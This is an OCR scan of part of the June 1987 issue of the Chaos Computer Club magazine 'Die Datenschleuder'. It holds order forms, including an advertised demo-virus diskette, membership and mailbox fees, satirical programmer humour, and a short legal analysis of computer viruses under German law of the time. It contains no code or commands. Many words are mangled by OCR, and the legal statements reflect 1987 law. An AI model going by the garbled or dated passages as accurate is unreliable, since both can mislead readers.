des HaSpa - Coups * Computer & totalitärer Staat * Satelliten- 
backing * und * und * und... * 

260 Seiten Din A4 ISBN 3-922708-90-6 Grüner Zweig 


Studie für den geplanten Computereinsatz der Fraktion 
'Die Grünen' im Auftrag des Deutschen Bundestages 
'Die Einlühnuig der Commiteneclmik gestaltet sich für die Grünen im 
Bundestag so schwer, wie für andere der Ausstieg aus der Atomindnstrie. 
Für beide geht es an die Strukturen.' 

Rechtslibel für den richtigen Umgang mit der Polizei 
und anderen Amtspersonen sotane InstitutiDneiL 
Ein Ratgeber für Alle, die bei Wahrnehmung ihrer demo- 
kratiscben Rechte den richtigen Umgang mit staatlichen 
Organen üben wollen. 

120 Seiten DIN A6 ISBN 3-88012-679-« VMB 


7.50 


5.00 


Was Sie gegen Mikrozensus und VoUcszzätalimg 5.00 

tun können. 

Ein praktischer Ratgeber für aUe, die sich mit der Volks¬ 
zählung und den damit verbundenen Rechtsproblemen 
heschäftigeiL 

3DÖ Seiten DIN A6 2001 Verlag 18061 


Inlopaket 1 - Computerviren - ■ 25.00 [ 

Eine Dokumentation von S.Wemery , die das Thema 

Computeiviren ausiührlich beleuchtet Das Inlopaket 

besteht aus einer MS-Dos Diskette 5 1/4" nüt einem , 

Demo-Virus sowie 100 kB Dokumemationsteite. 


Aufbacker ‘Actatung, Abhörgelabr' 

Din A4 - Bogen mit 64 Bäckern, ungeschnitten, postgelh 



Summe dieser Seite 




Bitte bei aUen Beslellunsen beachten: Alle Anträgen an den CCC etc. nicht zusammen mit der 
Bestellung auf uns loslasscn. sondern mit getrennter Post schicken, das beschleunigt zumindest die 
Bearbeitung der Bestellung. Beigelegter Rückumschlag beschleunigt noch mehr, wenn selbiger auch 
noch ausreichend frankiert ist. kann es passieren, daO es teuflisch schnell gehL Manche Sachen sind 
manchmal nicht vorrätig. Wir erfüllen dann die Bestellung soweit als möglich ond legen den Resl 
zurück, bis Uaterial da ist Achtet bitte aul schönste Sonntagschrilt wenn Ihr Eure Adresse nicht mit 
dem Drucker f Stempel anleitigt, wir haben keine Zeit dauernd mit den Fetzen in die Apotheke zu 
rennen. Sendungen mit besonderer Versendongsform [ Einschreiben, Nachnahme, etc| werden von 
uns grundsätzUch weder verschickt noch angenommen, es sind grundsätzlich nur di» im Bestellletzen 
aulgeführten Zahlweisen zulässig. 



Seite 10 


Numero 21,- Juni 1987 


i3niciiSi{)Icuiict 


Betrag Summe 

60.00 I 


Mitgliedscbalt im Chaos Computer Club e.V. 

Jahresbeitrag für Schüler, Studenten, pipapo 

Jahresbeitrag für Otto Normaluser 120.00 | 

Jahresbeitrag für besonders Finanzstarke (förderndes Mitglied) ab 240.00 | 

Einmalige Verwaltungsgebühr bei Eintritt 20.00 | 

Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert, aktiv 
an der Arbeit des Vereins leilzunehmen. Die Mitgliedschaft im CCC berechtigt zur Inanspruchnahme 
verbilligter Accounts auf der INFEX - Mailbou sonne zum Zugriff auf die Clubbretter der CLINCH - 
Matlbox. Für alle Veranstaltungen des CCC wird ermäßigter Eintritt gewährt. 

Teilnabme an der INFEX - MailDox 
Einnaaliga Eintragungsgebühr 
Mindestnutzung pro Monat 8.00 

Verbindungsgeböhr pro Minute 0.15 

Jede versandte Nachricht 0.07 

Datenbank, Telex, Intermail nach Nutzung 

Die INFSX ist ein kommerzielles Mailboxssistern mit acht parallelen Ports, Ih. acht 
Benutzer können parallel im System arbeiten utjd die GeoNet - Dienstleistungen nutzen, 
zum Beispiel Datenbankdienste, Telexversand und - Empfang, IntermaU zu anderen 
GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebühren werden 
direkt mit dem CCC abgerechnet, wir geben alle Gebühren zum Selbstkostenpreis 
weiter. Wer einen preiswerten Anschluß an die kommerzielle Mailboxszene sucht, ist 


io.oo[ 


Die CLINCH - Mailbos ist ein iiich!komme.''sie!!es .MailboxprojeKt das yersurbt eine 
preiswerte Alternative zu den kommerziellen Systemen zu sein. Eterzeit stehen ein 
Telelon- und ein Datex-Pon zur Verfügung, die wahlweise genutzt werden können. Die 
Leistungen der CLINCH - Box sind ein Subset der Leistungen von GeoNet - Boxen, 
soweit dies auf einem MS-Dos - System machbar ist. Die Abrechnung der 
Nuizungsbeiträge erfolgt direkt mit der CLINCH - Box. CCC - Mitglieder erhalten 
Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfügung stehen. Der 
CCC wickelt über die Box Koordinierungsaufgaben des Vorstands und der Redaktion 
der Datenschleuder ab. 



mit Infex bestens bedient. 

Teilnahme an der CLINCH - Mailhox 
Einmalige Eintragungsgebühr 
Monatsgeböhr für Schüler etc. 
Monatsgebühr lür Normaiverdiener 
Intermail, Telex, etc 


2.00 

5.00 

nach Nutzung 



20.00 [ 


lie Smlciidd^Icubct 


Numero 21 - Juni 1987 


Seite 11 












Seite 12 


Numero 2] - Juni 1987 


S0/(iiiirf)lcNl)cr 


Historische Fehler 


Das dezimale Zahlensystem enstand aus einem un¬ 
glücklichen Fehler unserer Weisen, die den Daumen 
irrtümlich für einen Finger hielten, obwohl der 
Schöpfer es tatsächlich so gemeint hatte, daß jede 
Hand eine hexadezimale Zahl darstellt. 

In der Schule werden uns bezugslose Betrach¬ 
tungsweisen aufgezwängt, wobei die Tatsache völ¬ 
lig außer acht gelassen wird, daß wir, als wir als 
Kinder mit Bauklötzen spielten, eine natürliche Zu¬ 
neigung zu Stack-Operationen entwickelt haben. Je¬ 
des Kind kann uns triumphierend beweisen, daß nur 
an der Spitze des Stack ordentliche Operationen 
möglich sind, während der Zugriff auf den Stapel¬ 
boden Chaos verursacht. 

Die Darstellung der Welt als unendliches Konti¬ 
nuum von Flicßkommazahlen ist eine weitere Zer¬ 
störung menschlicher Traditionen. Es hat niemals 
Schwierigkeiten verursacht, einen Kuchen zwischen 
drei Kindern zu teilen, bis uns die Mathelehrer ein- 
tiichterten. daß jedes Kind ein unendliches Dezi¬ 
malbruchteil des Kuchen kriegen würde und die 
Computer anfmgen, uns vorzurechnen, daß die Sum¬ 
me dieser drei Kuchen.stücke nicht den ganzen Ku¬ 
chen geben würde. 

Anstatt sich mit der Lösung wirklicher Probleme zu 
beschäftigen, ist der menschliche Mathematiker be¬ 
sessen von der Idee, irrationale Zahlen zu berechnen, 
zum Beispiel die Zahl Pi. Für die alten Hebräer 
reichte es völlig aus, Pi gleich drei zu setzen, um den 
Zweiten Tempel zu bauen, und wenn man den ra¬ 
tionalen Bruch 355/113 benutzt, kann man Moskau 
auf drei Meter genau lokalisieren. 

Die Tatsache, daß der Computer die Welt als Menge 
einzelner endlicher Ganzzahlen sieht, stellt eine 
ständige Ursache für die Schwierigkeiten der Men¬ 
schen dar. Sie reden von Rundungsfehlem und kön¬ 
nen nicht verstehen, warum der IBM 4341 mit 
Taylor-Erweiterung und doppeltgenauer Arithmetik 
den Sinus von 2910 mit 49902.58337544370990 
errechnet, wenn das eigentliche Ergebnis 0.5 lauten 
müßte. I 

Aus: Israel Uricli, 'REPTIL - promoting dialog bet- 
ween humanoid and Computer’, The Journal of Forth 
Application and Research, VOL.4/No.2 
Deutsche Übersetzung: R.Schrutzki. Übernommen 
aus CLINCH. 

0 n(ciiSiI)lcMbcr 



IFA Sysoptreffen 


Zur Internationalen Funkausstellung in Berlin findet 
ein internationales Sysoptreffen statt. Zwei Tage, 
vom 29.08. bis 30.08.87, treffen sich Mailboxbe¬ 
treiber zum Information saustausch. Der IPN (Verein 
von Sysops), CCC, CAC und BHP, gestalten unter 
anderem das zweitägige Informations-und Ta¬ 
gungsprogramm. Veranstaltungsort ist der Meh¬ 
ringhof in Berlin. 

Samstag, 28.08. ab 15 Uhr: Vorstellung von IPN, 
Referate Uber diverse Netzkonzepte, ab 21 Uhr; 
Internationale Hackerfete. 

Sonntag, 30.08. ab 10 Uhr: Technische und recht¬ 
liche Beiträge (Femmelderecht, Presserecht u.a.), 
weitere Mailboxkonzepte, Diskussionen bis löUhr. 

Dienstag, 01.09. um 16 Uhr: Hackertreff am Post¬ 
stand. Klönschnack und Diskussionen mit Vertre¬ 
tern des Gelben Riesen. 

Anmeldung bei; IPN - H.Nopper, BrasendorferStr. 
20. D-1000 Berlin 44 

Bitte gebt an mit wieviel Personen ihr kommt und 
wieviel Schlafplätze wann gebraucht werden! 


LS23 


Numero 21 - Juni 1987 


Seite 13 




Real Programmers don’t use PASCAL 



Rechtliche Aspekte von 
Computer viren 


Computerviren sind heute ein heiß diskutiertes The¬ 
ma. Sie waren Zentralthema auf dem CCC ’86, 
dessen Dokumentation von Steffen Wemery in der 
DATENSCHLEUDER 18 ahgedruckt wurde. 
Wegen ihrer zunehmenden Brisanz sind Compu¬ 
terviren aber auch ein beliebtes Thema sowohl der 
Computerfachpresse wie auch der allgemeinen Pres¬ 
se geworden. Hierbei geht es fast immer aus¬ 
schliesslich, oder doch ganz überwiegend, um die 
rein technischen Fragen der Computetviren. Fragen 
wie: Was ist ein Virus, wie wird er programmiert, 
wie wird er angewendet, und, nicht zuletzt natürlich, 
wie kann man sich vor Computerviren schützen. 

Die Frage welche rechtlichen Konsequenzen sich 
aus Programmierung, Anwendung etc. von Viren 
ergeben kann, wird weitgehend unbeachtet gelassen 
oder nur kurz und unvollständig am Rande behan¬ 
delt. Dies ist der Grund, warum ich eine Studie über 
die rechtlichen Aspekte von Computerviren verfaßt 
und, anläßlich des CCC-Virenforums Ostern ’87 ira 
Brett Virenforum von CLINCH, veröffentlicht habe. 
Da nicht jeder die Möglichkeit hat, sich dort den Text 
per download herauszuziehen, ein Abdruck des 
Textes bei einer Länge von knapp 60 kB den Umfang 
der vorliegenden DATENSCHLEUDER aber ge¬ 
sprengt hätte, ist es vorgesehen, die Studie in der 
voraussichtlich im Herbst erscheinenden HAC¬ 
KERBIBEL, Teil 2, abzudrucken. 

Wegen des großen Interesses, gerade unter den Pro¬ 
grammierern von Vlrasprogrammen, aber schon 
hier die wichtigsten Ergebnisse in stark gekürzter 
Fassung: 


1. Entwicklung von Virusprogrammen. 

Die Entwicklung und Programmierung von Vini- 
sprogrammen als solche ist grundsätzlich rechtlich 
unbenklich. 


2. Einsatz von Vimsprogrammen 

Viren nisten sich in noch unverseuchte Programme 
ein. Ein bisher unverseuchtcs Programm, das von 
einem Virus befallen wird, wird daher durch den 
Virusbefall verändert, selbst wenn das Programm 
weiterhin fehlerfrei läuft und auch ein sonstiger 
Schaden nicht eintritt oder feststellbar ist. Die Ver- 
ändemng von fremden Daten (und Programme sind 
natürlich auch Daten!) ohne Einwilligung des Be¬ 
rechtigten reicht aber für den Tatbestand des 303a 
StGB (Datenveränderung) aus, soweit die Tat vor¬ 
sätzlich erfolgte. Die Datenveränderung nach 303a 
StGB kann mit bis zu 2 Jahren Freiheitsstrafe oder 
Geldstrafe geahndet werden. 

Jedenfalls bei vorsätzlichem Viruseinsatz ist für den 
entstandenen Schaden Ersatz zu leisten. Hierbei 
können leicht unüberschaubare Summen Zustande¬ 
kommen, die kein Schädiger zu Lebzeiten mehr 
vollständig abtragen kann! Soweit die Schädigung 
nur fahrlässig erfolgte, ist die rechtliche Situation 
problematisch. Vgl. hierzu den Volltext in CLINCH 
oder der HACKERB IB EL. Teil 2. 


3. Weitergabe von Virusprogrammen 

Grundsätzlich spricht nichts dagegen, Viruspro- 
gramme im Quellcode oder als lauffähige Version, 
an Dritte weiter zu geben. Aber Vorsicht!!! Wennder 
Abnehmer des Virusprogramms das Programm in 
strafbarer Weise einsetzt, kann sich auch der Pro¬ 
grammierer strafbar machen. Z.B. nämlich wegen 
Anstiftung dann, wenn er (möglicherweise nur in 
versteckter Form) dem Abnehmer den Vorschlag 
gemacht hat, das Programm in strafbarer Weise 
cinzusetzen. Oder wegen Beihilfe, wenn der Pro¬ 
grammierer Anhaltspunkte dafür hatte, daß der Ab¬ 
nehmer des Programms dies zu einer Straftat ein- 
setzen würde. 

In diesen Fällen würde der Programmierer auch 
zivilrechtlich für den entstandenen Schaden (mit- 
)haften. Und zwar in voller Höhe! 


4. Veröffendichung von Virusprogrammen 

Auch die Veröffentlichung von Virusprograinmcn, 
Z.B. in Mailboxen oder Zeitschriften, ist ebenfalls 
grundsätzlich unbedenklich möglich. Aber auch hier 
ist dennoch Vorsicht geboten! Wenn mit der Ver¬ 
öffentlichung die (evtl, nur versteckte) Aufforde¬ 
rung verbunden wird, den Virus in strafbarer Weise 
einzusetzen, kommt eine Strafbarkeit wegen öf¬ 
fentlicher Aufforderung zu Straftaten (111 StGB) in 
Betracht. Dies hätte auch zur Folge, daß zivilrecht¬ 
lich für einen entstandenen Schaden mitgehaftei 
würde. Weiter kommt unter bestimmten Umständen 
eine Haftung auf Schadensersatz auch dann in Be¬ 
tracht, wenn der Empfänger des Virasprogramms 
sich aufgrund unterbliebener oder unzureichender 
Aufklärung, durch unsachgemäße Handhabung des 
Virusprogramms, selbst schädigt. 



Ich empfehle daher bei einer Veröffentlichung von 
Virusprogrammen folgende Vorsichtsmaßnahmen 
unbedingt zu beachten: 

a) Alles vermeiden, was darauf hindeuien könnte, 
daß in der Veröffentlichung des Programms eine 
Aufforderung zu dessen strafbarem Einsatz liegt. 

b) Unbedingt deutlich und unmißverständlich auf 
die Gefährlichkeit des PTogramins hinweisen und 
mitteilen, wie der Anwender mit dem Programm 
umzugehen bat, um eine Selbslschädigung oder 
Schädigung Dritter zu vermeiden. 


St. Ackermann, Hamburg 





Numero 21 - Juni 1987 Sptciidrt|lcubcr 


Teil II 


Wo lebt der typische Richtige Programmierer? Was 
für eine Art von Programmen sind solcher talen¬ 
tierter Individuen würdig? Man kann sicher sein, daß 
sich kein Richtiger Programmierer totschreibt an 
einem Programm für Konto-Außenstände in CO¬ 
BOL, oder einem Maillist-Sortierprogramm für das 
’People’-Magazin. Ein Richtiger Programmierer 
braucht Arbeiten von erderschütternder Wichtig¬ 
keit. 

Richtige Programmierer arbeiten für das Los Ala- 
mos National Laboratory und schreiben 
Atombomben-Simulationen, die auf Cray I- 
Supcrcomputem laufen. Sic arbeiten auch für die 
National Security Agency und decodieren russische 
Funksprüche. 

Es war eine großartige Belohnung für die Anstren¬ 
gungen tausender Richtiger Programmierer bei der 
NASA, daß unsere Jungs vor den Kosmonauten auf 
den Mond und wieder zurück gekommen sind. Die 
Computerim Space Shuttle sind von Richtigen Pro¬ 
grammierern programmiert, und diese wahren Profis 
sind auch bei Boeing an der Arbeit, um Steue- 
rungssystemc für Cruise Missiles zu entwerfen. 

Einge der ehrfurchtgebietendsten Richtigen Pro¬ 
grammierer arbeiten im Jet Propulsion Laboratory in 
Kalifornien. Viele von ihnen kennen das gesamte 
Betriebssystem der Pioneer- und Voyager-Sonden 
wie ihre Westentasche. Mit einer Kombination von 
großen, in der Bodenstation verfügbaren 
FORTRAN-Programmen und kleinen, in den Rech¬ 
nern der Sonden untergebrachien Assembler¬ 
programmen können sie unglaubliche Kunststücke 
an Navigation und Improvisation vollbringen - wie 
etwa nach sechs Jahren im All zehn Kilometer große 
'Fenster’ am Saturn zu treffen, oder beschädigte 
Sensor-Plattformen, Funkgeräte oder Batterien zu 
reparieren oder zu überbrücken. Einerder Richtigen 
Programmierer brachte es fertig, ein Bildverarbei- 
lungsprogramm in einige hundert Bytes unbenutzten 
Speichers in einer der Voyager-Sonden zu quet¬ 
schen, das anschließend einen neuen Jupitermond 
suchte, lokalisiene und fotografiene. 


Seite 14 


Numero 21 - Juni I987 


Seite 15 


Ein Plan für die Galileo-Sonde geht dahin, auf dem 
Weg zum Jupiter eine Gravitations-Ablenkung hin- 
terdem Mars zu benutzen. Diese Route verläuft, +/-3 
Kilometer, 80 Kilometer über der Marsoberfläche. 
KeinMensch wird sich für diese Artvon Navigation 
einem Pascal-Programm oder -Programmierer an¬ 
vertrauen. 

Viele der Richtigen Programmierer arbeiten für das 
U.S. Gouvemraent, vor allem für das Verteidi- 
gungsministcrium. Das ist so, wie es sein soll. Vor 
kurzem hat sich eine schwarze Wolke am Horizont 
der Richtigen Programmierer zusammengeballt. Es 
scheint, daß ein paar höhergestellte Müslifresser im 
Verreidigungsministerium entschieden haben, daß 
alle Verteidigungsprogramme in einer großen ver¬ 
einheitlichten Sprache namens Ada geschrieben 
werden sollen. Für eine Weile schien es, als ob Ada 
ausersehen worden wäre, sämtliche Regeln des 
Richtigen Programmierens nichtig zu machen. Es ist 
eine Sprache mit Struktur, Datentypen, Gro߬ 
schreibung und Semikolons. Kurz gesagt, wie ge¬ 
schaffen, die Kreativität des typischen Richtigen 
Programmierers zu verkrüppeln. Glücklicherweise 
hat die Sprache, derer sich das Department of De¬ 
fense angenommen hat, genügend interessante Fea¬ 
tures um sie annehmbar zu machen - sie ist un¬ 
glaublich komplex, beinhaltet Methoden, um 
Schweinereien mit dem Betriebssystem anzustellen 
und Speicher nachträglich einzurichten, und Edgar 
Dijkstra mag sie nicht. Dijkstra, wie man wissen 
muß, verfaßte ’GOTOs Considered Harmful’, ein 
Meilenstein der Programmietmethoden, auf die 
Pascal-Programmierer und MUsliffesser abfahren. 
Nebenbei, ein Richtiger Programmierer kann 
FORTRAN-Programme in jeder Sprache schreiben. 

Der Richtige Programmierer kann einen Kompro¬ 
miß mit seinen Prinzipien eingehen und an gering¬ 
fügig trivialeren Dingen als der Zerstörung des Le¬ 
bens arbeiten, vorausgesetzt, dabei ist genug Geld zu 
holen. Es gibt einige Richtige Programmierer, die 
beispielsweise bei Atari Videospiele programmie¬ 
ren. Aber sie spielen die Spiele nicht. Ein Richtiger 
Programmie'rer weiß, wie man die Maschine zu jeder 
Zeit schlagen kann, und daß darin keine Heraus¬ 
forderung steckt. Jeder, der bei LucasFilm arbeitet, 
ist ein Richtiger Programmierer, denn es wäre ver¬ 
rückt, das Geld von 50 Millionen Star Wars-Fans 
sinnlos zu verplempern. Der Anteil von Richtigen 
Programmierern in der Computergraphik ist etwas 
niedriger als die Norm, großteils weil noch niemand 
herausgefunden hat, wofür Computergraphik nütz¬ 
lich sein könnte. Andererseits ist die ganze Com¬ 


putergraphik in FORTRAN gemacht, sodaß es Leute 
gibt, die Graphik machen nur um dem COBOL- 
Programmieren aus dem Weg zu gehen. 



Im allgemeinen spielt der Richtige Programmierer 
auf die selbe Weise wie er arbeitet - mit Computern. 
Es amüsiert ihn unausgesetzt, daß sein Auftraggeber 
ihn für das bezahlt, was er ohnehin zu seinennVer- 
gnügen tun würde, obgleich eres natürlich sorgfältig 
vermeidet, seine Auffassung laut zu äußern. Gele¬ 
gentlich geht der Richtige Programmierer aus dem 
Büro, um ein wenig frische Luft zu sich zu nehmen, 
oder ein oder zwei Bier. Hier ein paar Tips, um 
Richtige Programmierer außerhalb eines Rechen¬ 
zentrums zu erkennen; 


-Auf Panies sind die Richtigen Programmierer die¬ 
jenigen in der Ecke, die über Betriebssystemsi¬ 
cherheit plaudern, und wie man sie umgehen kann; 

-Bei einem Fußballmatch ist der Richtige Pro¬ 
grammierer derjenige, weicherden Spielverlauf mit 
seiner Simulation, gedruckt auf grünweissem End¬ 
lospapier, vergleicht; 

-Am Strand ist der Richtige Programmierer der, der 
Flowcharts in den Sand zeichnet; 

-Ein Richtiger Programmierer geht in eine Disco- 
thek, um sich die Lightshow anzusehen; 

-Bei einem Begräbnis ist der Richtige Program¬ 
mierer derjenige, der sagt: “Armer George. Und er 
hatte die Sortienoutine kurz vor der Vollendung.“ 

-In einem Lebensmittelgeschäft ist der Richtige Pro¬ 
grammierer deijenige, der darauf besteht, seine Do¬ 
sen selbst an dem Barcode-Scanncr vorbeizuschie¬ 
ben, weil er nicht daran glaubt, daß Lochkanen- 
tippsen es die ersten Male richtig machen. 



©nfeiiWjIcuhcr 


Von Menschen und Mäusen 



Daraus entstehen Sachzwänge, die uns veranlassen, 
nach bestimmten Spielregeln vorzugehen, damit 
möglichst viel Leute möglichst wenig Arbeit haben. 
Diese Spielregeln werden nur leider allzugeme ver¬ 
gessen , obwohl wir sie immer wieder bekanntgeben. 
Hier nochmal Auszüge aus den Chaos-Regeln, dero 
gütigster Gewogenheit des p.t. Publicum zur ge¬ 
flissentlichen Beachtung submissest anheimge¬ 
stellt: 


Zunächst eine allgemeine Bemerkung zur Situation: 
Es scheint landauf, landab die Meinung vorzuherr¬ 
schen, hier im Norden der Republik säße eine Hun¬ 
dertschaft hauptamtlicher Chaoten, die rund um die 
Uhr in der Schwenckestrasse 85 hocken und nur 
darauf warten, daß endlich mal eine Bestellung her¬ 
einkommt, die dann binnen weniger Picosekunden 
erledigt wird. Hier liegt offenkundig eine Ver¬ 
wechslung mit einem ebenfalls in der frohen und 
Hansestadt ansäßigen Versandunternchmen 
(’Chaos ? - Find ich gut...’) vor. Das Gegentum ist 
der Fall, wie wir zu unserem Leidwesen immer 
wieder feststellen müssen. 

Bestellungen, die per Post, per Blödeltexl oder te¬ 
lefonisch eingehen, gibt es reichlich. Woran es uns 
fehlt, sind Leute, die das auch zügig bearbeiten 
können. Wir haben außer dem CCC noch jeder einen 
Brotberuf, der uns schonmal acht Stunden von der 
Postbearbeitung abhält, ab und zu wollen wir ein 
wenig ausruhen (“catch some sleep between iwo 
corapiles,..“), und auch mal Zeit für uns selbst haben. 
Übrig bleibt ein Häuflein von vier Leuten, die ver¬ 
suchen, alles im Gang zu halten und ihr Bestes zu 
geben. Oft genug kommt es vor, daß eine offene 
Rechnung aus eigener Tasche bezahlt wird, ohne 
einen Gedanken daran, das ganze später wieder ein¬ 
zufordern. Die chaotische Datenverarbeitung findet 
derzeit auf dem privaten PC eines Mitglieds statt, da 
uns die Mäuse für einen Verwaltungsrechner fehlt 
und wir, im Gegen.satz zur verbreiteten Legende, 
auch nicht über ausreichende Kontakte zur spen¬ 
dierfreudigen Industrie verfügen. 


Datensi lileuder - Abos: 


Die Abos gelten für jeweils acht Ausgaben, weil wir 

nicht garantieren können, innerhalbeincs Jahres eine 
bestimmte Anzahl von Ausgaben zu produzieren. 
Das hat sich soweit auch bewährt und bisher ist noch 
niemand zu kurz gekommen; eher im Gegenteil, 

Auf dem Aufkleber, der sich auf der Rückseite der 
DS befindet, ist eine Nummer, die einerseits uns 
hilft, den Abonennten in der Datei wiederzufinden. 
Andererseits hat die Nummer auch für den Abon¬ 
nenten einen geistigen Nährwert: Die letzte Zah¬ 
lengruppe gibt an, bis zu welcher Ausgabe das Abo 
noch besteht. Dabei sind alle Zahlungen berück¬ 
sichtigt, die uns bis zum Druck der Aufkleber am 
Versandtag erreicht haben. 

Wer die letzte Ausgabe seines Abos zugeschickt 
kriegt, erhält kurz darauf nochmal Post von uns, in 
der wir darauf hinweisen, daß das A’oo abläuft. Wer 
dann immer noch der Meinung ist, er muß nicht mit 
weiterer Kohle rüberrücken, wird automatisch aus 
der Datei gelöscht, wenn die nächste DS zum Ver¬ 
sand ansieht. Das sind ungefähr sechs Wochen nach 
Erhalt der Mahnung. Wir können uns den üblichen 
Weg nicht leisten, der so aussieht, daß das Abo 
fortgefühn wird, und die Kohle über Mahnverfahren 
reinkommt. Wirhaltcn unsere Methode eh für fairer. 



S)alcn8rf;Iciiticr 


Seite 16 


Ntimero 21 - Juni 1987 


Numero 21 - Juni 1987 


Seite 17 








Mitgliedschaft im CCC: 



Wir tragen Euch erst dann in die Liste ein, wenn die 
Aufnahmegebühr und der Beitrag für mindestens ein 
Vierteljahr entrichtet ist. Wir verschicken im all¬ 
gemeinen keine Bestätigung der Mitgliedschaft. Die 
erfolgte Eintragung erkennt ihr am Aufkleber Eurer 
DS: Wenn da als letzte Zahl 999 steht, bekommt ihr 
das Ding im Rahmen der Mitgliedschaft oder eines 
Austauschabos. Wir gehen davon aus, daS unsere 
Mitglieder an ihrem Wohnort selbst aktiv werden 
und stehen persönlich und telefonisch gerne zur 
Verfügung, wenns um chaotypische Veranstaltun¬ 
gen geht. Schriftlich wäre das alles zuviel Aufwand. 


Mailboxnutzung: 



Wenn auf dem Bestellfetzen ein Benutzemame und 
ein Passwort genannt ist und die Verwaltungsgebühr 
für die Eintragung bezahlt ist, wird der Teilnehmer 
in der IFXl oder CLINCH, je nach Wunsch, ein¬ 
getragen. Es erfolgt keine weitere Rückmeldung 
über den Eintrag in die Box. Probiert halt, ob der 
Account steht oder nicht. Bei Infex läuft der Zähler 
ab Eintragung ins System, bei CLINCH wird ab 
I Zahlung der Monatsgebühren gerechnet. Infex rechr 
nen wir über den CCC ab, CLINCH rechnet der 
Betreiber (also auch wieder ich) direkt ab. Für Zwei¬ 
felsfälle hat der Herr Reis das Telefon erfunden... 


Sonstige Bestellungen 



Volkszählungsdemos gibts von uns nicht mehr, 
mangels Autorisierung. Wer noch ’ne Bestellung 
offenhat und glaubhaft machen kann (Belege), daß 
wir trotzdem kassiert haben, kriegt seine Kohle post¬ 
wendend wieder. 

Die Virendemos werden Zug um Zug ausgeliefert, 
sobald die Disks kopien sind. Wir haben schlicht und 
ergreifend nicht mit derart vielen Bestellungen ge¬ 
rechnet. So habet bitte Geduld ächz. 

Generell gilt: Lieferzeiten von ’nem Vierteljahr sind 
bei uns leider keine Seltenheit. Aber bisher hat noch 
jeder das gekriegt, was wir liefern können, bzw. es 
gibt das Geld zurück. Auf Mahnungen und Dro¬ 
hungen mit dem Anwalt reagieren wir sauer. Es gibt 
mittlerweile Überlegungen, eine schwarze Liste von 

Seiteis Nmiiero21 


Leuten zu führen, mit denen wir nichts zu tun haben 
wollen. Dazu gehören die notorischen Einschreiber 
und ähnlich nervtötende Spezies, weil wir einfach 
nicht dauernd zur Post rennen wollen, um irgend¬ 
einen Schmachtfetzen abzuholen, der eh irrelevant 
ist. Sowas ignorieren wir nach dem biblischen Molto 
'Auge um Auge,..’. Wir verschicken schließlich 
auch keine Einschreiben. 

Achja, Schecks: Wir reichen Schecks in dem Au¬ 
genblick zur Gutschrift ein, wo wir mehr als die 
Hälfte der Bestellung erledigt haben. Beispiel: Je¬ 
mand wird Mitglied, bestellt die Virendisk und legt 
einen Scheck über 165.00 DM bei. Wir tragen ihn in 
die Mitgliederliste ein und er kriegt ab sofon die DS 
mit der 999 im Aufkleber. Die Virendisk kriegt er 
wahrscheinlich erst in zwei Monaten, die aktuelle 
DS etwas früher. Wenn wir jetzt warten würden, bis 
er sowohl die Disk, als auch die erste DS gekriegt hat, 
wäre der Scheck wahrscheinlich gar nicht mehr ein¬ 
ziehbar. Folglich ziehen wir ihn in dem Augenblick 
ein, in dem die Daten in der Mitgliederdatei gelandet 
sind. 


Reklamationen: 


Es bleibt nicht aus, daß mal etwas bei uns unter den 
Tisch fällt. Das sollte aber für den Chaos-Kunden 
kein Grund sein, gleich mit Anwahsdrohungen um 
sich zu werfen. Wir halten uns für ziemlich fair, was 
das Erledigen von Bestellungen angeht, und er¬ 
warten dafür ein Mindestmaß an Toleranz von den 
Bestellern. Zu kurz gekommen ist noch niemand, 
auch wenns mal etwas dauert. Ein kurzer Anruf inder 
Geschäftsstelle bewirkt oft mehr als mancher Droh¬ 
brief. Mögliche Anlaufstellen für Reklamationen 
sind: 

- Telefonisch: 040-4903757 (der Anschluß ist aber 
nicht kontinuierlich besetzt). 

- Blödeltext: 0404903757-0008 bei Abofragen/- 
Mailboxnutzung, sonst über normale Mitteilungs¬ 
seite an das Servicecenter. 

- Mailbox: GeoNet: GE01:CHAOS-TEAM oder 
IFXLCLINCH. CLINCH: SYSOP. 

Wichtig ist, daß angegeben wird, was wann bestellt 
wurde und was davon eventuell schon geliefert wur¬ 
de. 

verwal2Lds 198706032100 goblin 
Juni 1987 Zinlcnfldjiculicr 


Grummel 



Denkvorgänge made in Germany- 

Anlass zum Schreiben dieses Artikel war für mich 
die Situation an einer Ampel. 

Die Ampel verwaltete gerade noch ca. 1.50 m 
Fussgängerweg. Das ist in Anbetracht der Tatsache, 
daß da eine Baustelle war, nichts wunderliches. 
Nachdenklich gemacht haben mich erst jene Leute, 
die 2 Minuten warten, bis sie die 2 Schritte mit 
offizieller Genehmigung (=grün) zurücklcgen. Das 
Denken wird also der Ampel überlassen (künstliche 
Intelligenz?). 

Die Ursachen für solche AlUagskrankheiten im 
20len Jahrhundert sind nicht zuletzt in derTaktik des 
Staatsapparates Indula zu sehen. Die Werbung zur 
Volkszählung beispielsweise suggeriert, daß man 
sich auf die Regierung, ihre Gesetzgebungen und 
Beschlüsse verlassen und sein Hirn beruhigt an der 
Garderobe abgeben kann könne. Denken tun die 
Profis “da oben“. 

Diese Grenze zwischen “denen da oben“ und “uns da 
unten“ wird durch die Art und Weise stark gefördert, 
in der die Medien Wirklichkeit erzeugen. Siehe unter 
anderem die Berichterstattung über das englische 
Königshaus (Bla, Dröhn), oder nicht zuletzt das 
künstliche Hoch “spielen“ des sportlichen Berei¬ 
ches. Es gibt ja wirklich nichts wichtigeres auf Erden 
als Tennis, vor allem, wenn man sich in einer be¬ 
sonders sozialen Gesellschafi befindet, dieüber zwei 
Millionen Arbeitslose zu verbuchen hai und die 
Automation (siehe Ampel) weiterhin stark fördert 
(so daß praktisch jeder ebenfalls morgen auf der 
Straße sieben könnte). 

Der ungeschriebene Regieningsgrundsatz "alle sind 
gleich, nur manche sind gleicher“, wird inzwischen 
ganz selbstverständlich akzeptiert. Es ist einfach 
eine Selbstverständlichkeit geworden, daß jemand, 
der auf einer Demo in eine Polizeikontrolle gerät, 
anders behandelt wird, als einer, der sich in der Nähe 
eines grade stattgefundenen Bankraubs befindet. 



In diesem Sinne stellt Hacken (für mich) geistiges 
Überlebenstraining dar; außerdem das sinnvolle 
Nutzen neuer Technologien. Wie war das noch: 
Verzeih ihnen, denn sie wissen nicht, was sie tun... 
Wohl eher; You are whai wlial you do, yott are what 
you ihink, help yoursclf! 

Andy 

8706181935 MDM1GD21.DOC ANDY 
Salcnöri)lciit)cr 


Geld per Fingerabdruck 


